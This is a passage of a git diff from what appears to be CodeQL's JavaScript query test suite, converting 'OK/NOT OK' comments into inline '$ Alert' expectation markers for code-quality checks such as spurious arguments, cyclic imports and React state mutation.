{return;} }; -otherglobal(x); // NOT OK: can never refer to function on line 12 -otherglobal.call(null, x); // NOT OK -otherglobal.call(null, x, y); // NOT OK +otherglobal(x); // $ Alert - can never refer to function on line 12 +otherglobal.call(null, x); // $ Alert +otherglobal.call(null, x, y); // $ Alert diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/reflection.js b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/reflection.js index 22c8c3b537e7..ac2df0dafdce 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/reflection.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/reflection.js @@ -3,13 +3,13 @@ function f1(x) {return;} f0.call(); f0.call(this); -f0.call(this, 1); -f0.call(this, 1, 2); +f0.call(this, 1); // $ Alert +f0.call(this, 1, 2); // $ Alert f1.call(); f1.call(this); f1.call(this, 1); -f1.call(this, 1, 2); +f1.call(this, 1, 2); // $ Alert f0.apply(); f0.apply(this); diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/thisparameter.ts b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/thisparameter.ts index d166c957858e..d17b5d33459f 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/thisparameter.ts +++ b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/thisparameter.ts @@ -1,4 +1,4 @@ function foo(this: void, x: number) {return;} -foo(45); // OK -foo(null, 45); // NOT OK +foo(45); +foo(null, 45); // $ Alert diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/tst.js index 1caa88564a1a..387348232e3d 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/tst.js @@ -7,8 +7,7 @@ function g() { return 23; } -// NOT OK -f(g()); +f(g()); // $ Alert function sum() { var result = 0; @@ -17,33 +16,31 @@ function sum() { return result; } -// OK + sum(1, 2, 3); function h(k) { k = k || function() {}; - // OK + k(42); } -// OK + new Array(1, 2, 3); -// NOT OK -new String(1, 2, 3); +new String(1, 2, 3); // $ Alert (function(f) { - // NOT OK - f(42); + f(42); // $ Alert })(function() {return;}); (function h(f) { - // OK + f(42); h(function(x) { return x; }); })(function() {}); -parseFloat("123", 10); +parseFloat("123", 10); // $ Alert - unlike parseInt this does not take a radix (function testWhitelistEmptyFunctions(){ function nonEmpty(){ @@ -67,15 +64,15 @@ parseFloat("123", 10); constructor(){ } } - nonEmpty(42); // NOT OK - empty(42); // OK - emptyWithParam(42, 87); // OK - commentedEmpty(42); // OK - commentedEmptyWithSpreadParam(42, 87); // OK - emptyArrow(42); // NOT OK - new ImplicitEmptyConstructor(42); // NOT OK - new ExplicitEmptyConstructor(42); // NOT OK - parseFloat("123", 10); // NOT OK + nonEmpty(42); // $ Alert + empty(42); + emptyWithParam(42, 87); + commentedEmpty(42); + commentedEmptyWithSpreadParam(42, 87); + emptyArrow(42); // $ Alert + new ImplicitEmptyConstructor(42); // $ Alert + new ExplicitEmptyConstructor(42); // $ Alert + parseFloat("123", 10); // $ Alert }); (function testWhitelistThrowingFunctions() { @@ -111,14 +108,14 @@ parseFloat("123", 10); } })(); } - notAPlainThrower1(42); // NOT OK - notAPlainThrower2(42); // NOT OK - notAPlainThrower3(42); // NOT OK - thrower(42); // OK - throwerArrow(42); // OK - throwerCustom(42); // OK - throwerWithParam(42, 87); // NOT OK - throwerIndirect(42); // OK, but still flagged due to complexity + notAPlainThrower1(42); // $ Alert + notAPlainThrower2(42); // $ Alert + notAPlainThrower3(42); // $ Alert + thrower(42); + throwerArrow(42); + throwerCustom(42); + throwerWithParam(42, 87); // $ Alert + throwerIndirect(42); // $ SPURIOUS: Alert - flagged due to complexity }); function sum2() { @@ -128,14 +125,14 @@ function sum2() { return result; } -// OK + sum2(1, 2, 3); const $ = function (x, arr) { console.log(x, arr); }; -// OK + async function tagThing(repoUrl, directory) { await $`git clone ${repoUrl} ${directory}`; } diff --git a/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/StrictModeCallStackIntrospection.expected b/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/StrictModeCallStackIntrospection.expected index 967ac1ce58f3..7141c9d5589e 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/StrictModeCallStackIntrospection.expected +++ b/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/StrictModeCallStackIntrospection.expected @@ -1,7 +1,7 @@ -| tst.js:5:30:5:45 | arguments.callee | Strict mode code cannot use arguments.callee. | -| tst.js:7:21:7:36 | arguments.callee | Strict mode code cannot use arguments.callee. | -| tst.js:9:20:9:27 | f.caller | Strict mode code cannot use Function.prototype.caller. | -| tst.js:11:17:11:27 | f.arguments | Strict mode code cannot use Function.prototype.arguments. | -| tst.js:18:10:18:25 | arguments.callee | Strict mode code cannot use arguments.callee. | -| tst.js:31:12:31:21 | foo.caller | Strict mode code cannot use Function.prototype.caller. | -| tst.js:31:12:31:21 | foo.caller | Strict mode code cannot use arguments.caller. | +| tst.js:4:30:4:45 | arguments.callee | Strict mode code cannot use arguments.callee. | +| tst.js:5:21:5:36 | arguments.callee | Strict mode code cannot use arguments.callee. | +| tst.js:6:20:6:27 | f.caller | Strict mode code cannot use Function.prototype.caller. | +| tst.js:7:17:7:27 | f.arguments | Strict mode code cannot use Function.prototype.arguments. | +| tst.js:13:10:13:25 | arguments.callee | Strict mode code cannot use arguments.callee. | +| tst.js:25:12:25:21 | foo.caller | Strict mode code cannot use Function.prototype.caller. | +| tst.js:25:12:25:21 | foo.caller | Strict mode code cannot use arguments.caller. | diff --git a/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/StrictModeCallStackIntrospection.qlref b/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/StrictModeCallStackIntrospection.qlref index d093603e0779..92a121e2099c 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/StrictModeCallStackIntrospection.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/StrictModeCallStackIntrospection.qlref @@ -1 +1,2 @@ -LanguageFeatures/StrictModeCallStackIntrospection.ql \ No newline at end of file +query: LanguageFeatures/StrictModeCallStackIntrospection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/tst.js index 583daac6ccca..6965cab8bae0 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/tst.js @@ -1,25 +1,20 @@ var o = { A: function f(x) { 'use strict'; - // BAD - if (!(this instanceof arguments.callee)) - // BAD - return new arguments.callee(x); - // BAD - console.log(f.caller); - // BAD - this.y = f.arguments; + if (!(this instanceof arguments.callee)) // $ Alert + return new arguments.callee(x); // $ Alert + console.log(f.caller); // $ Alert + this.y = f.arguments; // $ Alert this.x = x; } }; var D = class extends function() { - // BAD - return arguments.callee; + return arguments.callee; // $ Alert } {}; function g() { - // OK + return arguments.caller.length; } @@ -27,8 +22,7 @@ function g() { 'use strict'; function h() { var foo = Math.random() > 0.5 ? h : arguments; - // BAD - return foo.caller; + return foo.caller; // $ Alert } })(); diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SyntaxError/SyntaxError.qlref b/javascript/ql/test/query-tests/LanguageFeatures/SyntaxError/SyntaxError.qlref index 33bc1d9e3b45..4133f6e98314 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SyntaxError/SyntaxError.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/SyntaxError/SyntaxError.qlref @@ -1 +1 @@ -LanguageFeatures/SyntaxError.ql +query: LanguageFeatures/SyntaxError.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SyntaxError/arrows.js b/javascript/ql/test/query-tests/LanguageFeatures/SyntaxError/arrows.js index 62468802e464..ce50894cacea 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SyntaxError/arrows.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SyntaxError/arrows.js @@ -1 +1 @@ -(a, a) => a + a; +(a, a) => a + a; // $ Alert diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SyntaxError/destructingPrivate.js b/javascript/ql/test/query-tests/LanguageFeatures/SyntaxError/destructingPrivate.js index 060111d86b46..4edd6cb2d6f9 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SyntaxError/destructingPrivate.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SyntaxError/destructingPrivate.js @@ -1,6 +1,6 @@ class C { #privDecl; bar() { - {#privDecl} = this; + {#privDecl} = this; // $ Alert } } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SyntaxError/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/SyntaxError/tst.js index e7aaa89f128a..62acf99f0477 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SyntaxError/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SyntaxError/tst.js @@ -1,2 +1,2 @@ function findBox() { - return $("box.important + return $("box.important // $ Alert diff --git a/javascript/ql/test/query-tests/LanguageFeatures/TemplateSyntaxInStringLiteral/TemplateSyntaxInStringLiteral.js b/javascript/ql/test/query-tests/LanguageFeatures/TemplateSyntaxInStringLiteral/TemplateSyntaxInStringLiteral.js index 65a61da7a616..d21a662dc5e8 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/TemplateSyntaxInStringLiteral/TemplateSyntaxInStringLiteral.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/TemplateSyntaxInStringLiteral/TemplateSyntaxInStringLiteral.js @@ -2,7 +2,7 @@ function connectAndLog(id) { log.info(`Connecting to ${id}`) let connection = openConnection(id) if (!connection) { - log.error('Could not connect to ${id}') + log.error('Could not connect to ${id}') // $ Alert } } @@ -14,9 +14,9 @@ function emitTemplate(name, date) { var globalVar = "global"; function foo() { - log.error('globalVar = ${globalVar}'); + log.error('globalVar = ${globalVar}'); // $ Alert } -log.error('globalVar = ${globalVar}'); +log.error('globalVar = ${globalVar}'); // $ Alert function bar() { log.error('Something ${notInScope}'); @@ -25,7 +25,7 @@ function bar() { function baz(x){ log.error("${x}"); log.error("${y}"); - log.error("${x} "); + log.error("${x} "); // $ Alert log.error("${y} "); } @@ -37,7 +37,7 @@ function foo1() { const foobar = 4; const data = {name: name, date: date}; - writer.emit("Name: ${name}, Date: ${date}.", data); // OK + writer.emit("Name: ${name}, Date: ${date}.", data); - writer.emit("Name: ${name}, Date: ${date}, ${foobar}", data); // NOT OK - `foobar` is not in `data`. + writer.emit("Name: ${name}, Date: ${date}, ${foobar}", data); // $ Alert - `foobar` is not in `data`. } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/LanguageFeatures/TemplateSyntaxInStringLiteral/TemplateSyntaxInStringLiteral.qlref b/javascript/ql/test/query-tests/LanguageFeatures/TemplateSyntaxInStringLiteral/TemplateSyntaxInStringLiteral.qlref index 372cdfd68f5d..6eb187fa573a 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/TemplateSyntaxInStringLiteral/TemplateSyntaxInStringLiteral.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/TemplateSyntaxInStringLiteral/TemplateSyntaxInStringLiteral.qlref @@ -1 +1,2 @@ -LanguageFeatures/TemplateSyntaxInStringLiteral.ql +query: LanguageFeatures/TemplateSyntaxInStringLiteral.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/ThisBeforeSuper/ThisBeforeSuper.expected b/javascript/ql/test/query-tests/LanguageFeatures/ThisBeforeSuper/ThisBeforeSuper.expected index e4a1e1a53dff..dbc274d613c1 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/ThisBeforeSuper/ThisBeforeSuper.expected +++ b/javascript/ql/test/query-tests/LanguageFeatures/ThisBeforeSuper/ThisBeforeSuper.expected @@ -10,5 +10,5 @@ | invalid.js:14:35:14:118 | () { cl ... er(); } | The super constructor must be called before using $@. | invalid.js:14:99:14:102 | this | this | | invalid.js:15:71:15:95 | () { th ... er(); } | The super constructor must be called before using $@. | invalid.js:15:76:15:79 | this | this | | invalid.js:16:35:16:66 | () { if ... .a(); } | The super constructor must be called before using $@. | invalid.js:16:56:16:59 | this | this | -| invalid.js:26:16:26:19 | () {\\n ... ;\\n } | The super constructor must be called before using $@. | invalid.js:27:9:27:12 | this | this | -| invalid.js:26:16:26:19 | () {\\n ... ;\\n } | The super constructor must be called before using $@. | invalid.js:28:9:28:12 | this | this | +| invalid.js:26:16:26:30 | () { // ... ;\\n } | The super constructor must be called before using $@. | invalid.js:27:9:27:12 | this | this | +| invalid.js:26:16:26:30 | () { // ... ;\\n } | The super constructor must be called before using $@. | invalid.js:28:9:28:12 | this | this | diff --git a/javascript/ql/test/query-tests/LanguageFeatures/ThisBeforeSuper/ThisBeforeSuper.qlref b/javascript/ql/test/query-tests/LanguageFeatures/ThisBeforeSuper/ThisBeforeSuper.qlref index f755c5a9d472..0d3e717fe79a 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/ThisBeforeSuper/ThisBeforeSuper.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/ThisBeforeSuper/ThisBeforeSuper.qlref @@ -1 +1,2 @@ -LanguageFeatures/ThisBeforeSuper.ql \ No newline at end of file +query: LanguageFeatures/ThisBeforeSuper.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/ThisBeforeSuper/invalid.js b/javascript/ql/test/query-tests/LanguageFeatures/ThisBeforeSuper/invalid.js index 82e7f8cda77e..c70e2cdcf7f1 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/ThisBeforeSuper/invalid.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/ThisBeforeSuper/invalid.js @@ -2,18 +2,18 @@ // under the MIT license; see file LICENSE. class B1 {} -class A30 extends B1 { constructor() { this.c = 0; } } -class A31 extends B1 { constructor() { this.c(); } } -class A32 extends B1 { constructor() { super.c(); } } -class A33 extends B1 { constructor() { this.c = 0; super(); } } -class A34 extends B1 { constructor() { this.c(); super(); } } -class A35 extends B1 { constructor() { super.c(); super(); } } -class A36 extends B1 { constructor() { super(this.c); } } -class A37 extends B1 { constructor() { super(this.c()); } } -class A38 extends B1 { constructor() { super(super.c()); } } -class A39 extends B1 { constructor() { class C extends D { constructor() { super(); this.e(); } } this.f(); super(); } } -class A40 extends B1 { constructor() { class C extends D { constructor() { this.e(); super(); } } super(); this.f(); } } -class A41 extends B1 { constructor() { if (a) super(); this.a(); } } +class A30 extends B1 { constructor() { this.c = 0; } } // $ Alert +class A31 extends B1 { constructor() { this.c(); } } // $ Alert +class A32 extends B1 { constructor() { super.c(); } } // $ Alert +class A33 extends B1 { constructor() { this.c = 0; super(); } } // $ Alert +class A34 extends B1 { constructor() { this.c(); super(); } } // $ Alert +class A35 extends B1 { constructor() { super.c(); super(); } } // $ Alert +class A36 extends B1 { constructor() { super(this.c); } } // $ Alert +class A37 extends B1 { constructor() { super(this.c()); } } // $ Alert +class A38 extends B1 { constructor() { super(super.c()); } } // $ Alert +class A39 extends B1 { constructor() { class C extends D { constructor() { super(); this.e(); } } this.f(); super(); } } // $ Alert +class A40 extends B1 { constructor() { class C extends D { constructor() { this.e(); super(); } } super(); this.f(); } } // $ Alert +class A41 extends B1 { constructor() { if (a) super(); this.a(); } } // $ Alert // the following two cases are not currently detected (even though they should be): // while `this` is, in both cases, guarded by a `super` call, the call does not complete @@ -23,7 +23,7 @@ class A42 extends B2 { constructor() { try { super(); } finally { this.a; } } } class A43 extends B2 { constructor() { try { super(); } catch (err) { } this.a; } } class A44 extends B1 { - constructor() { + constructor() { // $ Alert this.p1 = 0; this.p2 = 0; } diff --git a/javascript/ql/test/query-tests/LanguageFeatures/UnusedIndexVariable/UnusedIndexVariable.js b/javascript/ql/test/query-tests/LanguageFeatures/UnusedIndexVariable/UnusedIndexVariable.js index 7f6071b86963..7d139a4d582c 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/UnusedIndexVariable/UnusedIndexVariable.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/UnusedIndexVariable/UnusedIndexVariable.js @@ -1,6 +1,6 @@ function sum(xs) { var res = 0; - for(var i=0; i | | +| selfimport.js:1:1:1:23 | require ... mport') | Module selfimport directly imports itself. | selfimport.js:1:1:1:35 | | | | test1/a.js:1:1:1:27 | require ... ner/a') | Module /test1/a.js imports module .../inner/a.js, which in turn $@ it. | test2/inner/a.js:1:1:1:24 | require ... st1/a') | imports | | test1/a.js:2:1:2:14 | require('./b') | Module a imports module b, which in turn $@ it. | test1/b.js:1:1:1:27 | require ... ner/a') | indirectly imports | | test1/b.js:1:1:1:27 | require ... ner/a') | Module b imports module a, which in turn $@ it. | test2/inner/a.js:1:1:1:24 | require ... st1/a') | indirectly imports | diff --git a/javascript/ql/test/query-tests/NodeJS/CyclicImport/CyclicImport.qlref b/javascript/ql/test/query-tests/NodeJS/CyclicImport/CyclicImport.qlref index 944a1f16d023..2f1ba00da9b5 100644 --- a/javascript/ql/test/query-tests/NodeJS/CyclicImport/CyclicImport.qlref +++ b/javascript/ql/test/query-tests/NodeJS/CyclicImport/CyclicImport.qlref @@ -1 +1,2 @@ -NodeJS/CyclicImport.ql \ No newline at end of file +query: NodeJS/CyclicImport.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/NodeJS/CyclicImport/a.js b/javascript/ql/test/query-tests/NodeJS/CyclicImport/a.js index 6e20c34bb2ae..e435ffdd6e61 100644 --- a/javascript/ql/test/query-tests/NodeJS/CyclicImport/a.js +++ b/javascript/ql/test/query-tests/NodeJS/CyclicImport/a.js @@ -1,7 +1,7 @@ // Adapted from the Node.js documentation console.log('a starting'); exports.done = false; -var b = require('./b.js'); +var b = require('./b.js'); // $ Alert console.log('in a, b.done = %j', b.done); exports.done = true; console.log('a done'); diff --git a/javascript/ql/test/query-tests/NodeJS/CyclicImport/b.js b/javascript/ql/test/query-tests/NodeJS/CyclicImport/b.js index 48d00da05eec..b8b1b26c76a8 100644 --- a/javascript/ql/test/query-tests/NodeJS/CyclicImport/b.js +++ b/javascript/ql/test/query-tests/NodeJS/CyclicImport/b.js @@ -1,7 +1,7 @@ // Adapted from the Node.js documentation console.log('b starting'); exports.done = false; -var a = require('./a.js'); +var a = require('./a.js'); // $ Alert console.log('in b, a.done = %j', a.done); exports.done = true; console.log('b done'); diff --git a/javascript/ql/test/query-tests/NodeJS/CyclicImport/selfimport.js b/javascript/ql/test/query-tests/NodeJS/CyclicImport/selfimport.js index 524cd7785c61..015dd055baa7 100644 --- a/javascript/ql/test/query-tests/NodeJS/CyclicImport/selfimport.js +++ b/javascript/ql/test/query-tests/NodeJS/CyclicImport/selfimport.js @@ -1 +1 @@ -require('./selfimport'); \ No newline at end of file +require('./selfimport'); // $ Alert \ No newline at end of file diff --git a/javascript/ql/test/query-tests/NodeJS/CyclicImport/test1/a.js b/javascript/ql/test/query-tests/NodeJS/CyclicImport/test1/a.js index c50b18df78a5..19e985960836 100644 --- a/javascript/ql/test/query-tests/NodeJS/CyclicImport/test1/a.js +++ b/javascript/ql/test/query-tests/NodeJS/CyclicImport/test1/a.js @@ -1,2 +1,2 @@ -require('../test2/inner/a'); -require('./b'); \ No newline at end of file +require('../test2/inner/a'); // $ Alert +require('./b'); // $ Alert \ No newline at end of file diff --git a/javascript/ql/test/query-tests/NodeJS/CyclicImport/test1/b.js b/javascript/ql/test/query-tests/NodeJS/CyclicImport/test1/b.js index 4dad3ca3b97f..c1527dc042ca 100644 --- a/javascript/ql/test/query-tests/NodeJS/CyclicImport/test1/b.js +++ b/javascript/ql/test/query-tests/NodeJS/CyclicImport/test1/b.js @@ -1 +1 @@ -require('../test2/inner/a'); \ No newline at end of file +require('../test2/inner/a'); // $ Alert \ No newline at end of file diff --git a/javascript/ql/test/query-tests/NodeJS/CyclicImport/test2/inner/a.js b/javascript/ql/test/query-tests/NodeJS/CyclicImport/test2/inner/a.js index c96937e40a33..cc49a519bc0d 100644 --- a/javascript/ql/test/query-tests/NodeJS/CyclicImport/test2/inner/a.js +++ b/javascript/ql/test/query-tests/NodeJS/CyclicImport/test2/inner/a.js @@ -1 +1 @@ -require('../../test1/a'); \ No newline at end of file +require('../../test1/a'); // $ Alert \ No newline at end of file diff --git a/javascript/ql/test/query-tests/NodeJS/DubiousImport/DubiousImport.qlref b/javascript/ql/test/query-tests/NodeJS/DubiousImport/DubiousImport.qlref index 6b556de9f00b..c6005b442606 100644 --- a/javascript/ql/test/query-tests/NodeJS/DubiousImport/DubiousImport.qlref +++ b/javascript/ql/test/query-tests/NodeJS/DubiousImport/DubiousImport.qlref @@ -1 +1,2 @@ -NodeJS/DubiousImport.ql \ No newline at end of file +query: NodeJS/DubiousImport.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/NodeJS/DubiousImport/a.js b/javascript/ql/test/query-tests/NodeJS/DubiousImport/a.js index 2c75ba0124ff..c0c95c0d5f67 100644 --- a/javascript/ql/test/query-tests/NodeJS/DubiousImport/a.js +++ b/javascript/ql/test/query-tests/NodeJS/DubiousImport/a.js @@ -1,4 +1,4 @@ -var foo = require('./b').foo, +var foo = require('./b').foo, // $ Alert bar = require('./c').bar, sneaky = require('./d').sneaky; diff --git a/javascript/ql/test/query-tests/NodeJS/DubiousImport/main.js b/javascript/ql/test/query-tests/NodeJS/DubiousImport/main.js index b4645ff98881..6f2bd18a9127 100644 --- a/javascript/ql/test/query-tests/NodeJS/DubiousImport/main.js +++ b/javascript/ql/test/query-tests/NodeJS/DubiousImport/main.js @@ -2,7 +2,7 @@ var b = require('./b'), c = require('./c'), d = require('./d'); -b.foo; +b.foo; // $ Alert c.bar; d.sneaky; b.prototype; @@ -12,7 +12,7 @@ require('./f').tricky; var fs = require('fs'); fs.rename('foo', 'bar', function() {}); -fs.renmae('foo', 'bar', function() {}); +fs.renmae('foo', 'bar', function() {}); // $ Alert fs.move('foo', 'bar', function() {}); var k = require('./k'); @@ -20,7 +20,7 @@ k.foo; var l = require('./l'); l.foo(); -l.bar(); // not OK +l.bar(); // $ Alert require('./m').foo; diff --git a/javascript/ql/test/query-tests/NodeJS/DubiousImport/multi_import.js b/javascript/ql/test/query-tests/NodeJS/DubiousImport/multi_import.js index cacb69772fe9..7eb45e2cfabb 100644 --- a/javascript/ql/test/query-tests/NodeJS/DubiousImport/multi_import.js +++ b/javascript/ql/test/query-tests/NodeJS/DubiousImport/multi_import.js @@ -10,10 +10,10 @@ if (cond) { } if (cond) { - mod1.call(); // OK: `mod1` is `./b`, which exports `call` + mod1.call(); // OK - `mod1` is `./b`, which exports `call` } else { - mod1.bar; // OK: `mod1` is `./c`, which exports `bar` - mod2.bar; // NOT OK: `mod2` is `./b`, which does not export `call` + mod1.bar; // OK - `mod1` is `./c`, which exports `bar` + mod2.bar; // $ Alert - `mod2` is `./b`, which does not export `call` } module.exports = {}; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/InvalidExport.qlref b/javascript/ql/test/query-tests/NodeJS/InvalidExport/InvalidExport.qlref index 6864d74ec268..5225f0d052a9 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/InvalidExport.qlref +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/InvalidExport.qlref @@ -1 +1,2 @@ -NodeJS/InvalidExport.ql \ No newline at end of file +query: NodeJS/InvalidExport.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst.js b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst.js index 83bd3009a8ba..61a2663a7ad6 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst.js +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst.js @@ -1,2 +1,2 @@ -exports.a = 23; // OK -exports = 56; // NOT OK +exports.a = 23; +exports = 56; // $ Alert diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2a.js b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2a.js index c650950972b5..f02b2cdaa4f7 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2a.js +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2a.js @@ -1,3 +1,3 @@ -// OK: use of `exports` as shorthand for `module.exports` +// OK - use of `exports` as shorthand for `module.exports` exports = module.exports = {}; exports.a = 23; diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2b.js b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2b.js index 67a979faef7a..f3c20feff45f 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2b.js +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2b.js @@ -1,3 +1,3 @@ -// OK: use of `exports` as shorthand for `module.exports` +// OK - use of `exports` as shorthand for `module.exports` module.exports = exports = {}; exports.a = 23; diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2c.js b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2c.js index 18089f129a6e..d7269a450093 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2c.js +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2c.js @@ -1,4 +1,4 @@ -// OK: use of `exports` as shorthand for `module.exports` +// OK - use of `exports` as shorthand for `module.exports` exports = {}; exports.a = 23; module.exports = exports; diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst3.js b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst3.js index 93448cd102f9..78ea98c06292 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst3.js +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst3.js @@ -1,2 +1,2 @@ -// OK: useless assignment flagged by other query +// OK - useless assignment flagged by other query exports = module.exports = { a: 23 }; diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst3b.js b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst3b.js index 679437bd5b9d..e638381c2690 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst3b.js +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst3b.js @@ -1,2 +1,2 @@ -// OK: useless assignment flagged by other query +// OK - useless assignment flagged by other query module.exports = exports = { a: 23 }; diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst4.js b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst4.js index c24fd42b6dd9..2a5f22cb49d8 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst4.js +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst4.js @@ -1,2 +1,2 @@ -module.exports.a = 23; // OK -module.exports = 56; // OK +module.exports.a = 23; +module.exports = 56; diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst5.js b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst5.js index 4b93bb8f7f40..9361a968088c 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst5.js +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst5.js @@ -1,4 +1,4 @@ module.exports = exports; -exports = {}; // NOT OK, reassignment above should appear below +exports = {}; // $ Alert - reassignment above should appear below exports.a = 12; diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst6.js b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst6.js index d91971d6f519..cf5eb12ff0ac 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst6.js +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst6.js @@ -1,4 +1,4 @@ var e = {}; module.exports = e; -exports = e; // OK +exports = e; exports.a = 12; diff --git a/javascript/ql/test/query-tests/NodeJS/MissingExports/MissingExports.js b/javascript/ql/test/query-tests/NodeJS/MissingExports/MissingExports.js index 091cf6fef202..bd8d05fcd03a 100644 --- a/javascript/ql/test/query-tests/NodeJS/MissingExports/MissingExports.js +++ b/javascript/ql/test/query-tests/NodeJS/MissingExports/MissingExports.js @@ -4,5 +4,5 @@ exports.checkOne = function(x) { var checkList = exports.checkList = function(xs) { for (var i=0; iHello {this.props.name}
    ; } }); diff --git a/javascript/ql/test/query-tests/React/DirectStateMutation/invalid2.js b/javascript/ql/test/query-tests/React/DirectStateMutation/invalid2.js index c790106ba3e1..4c87a1f8b0db 100644 --- a/javascript/ql/test/query-tests/React/DirectStateMutation/invalid2.js +++ b/javascript/ql/test/query-tests/React/DirectStateMutation/invalid2.js @@ -1,6 +1,6 @@ var Hello = React.createClass({ render: function() { - this.state.person.name= "bar" + this.state.person.name= "bar" // $ Alert return
    Hello {this.props.name}
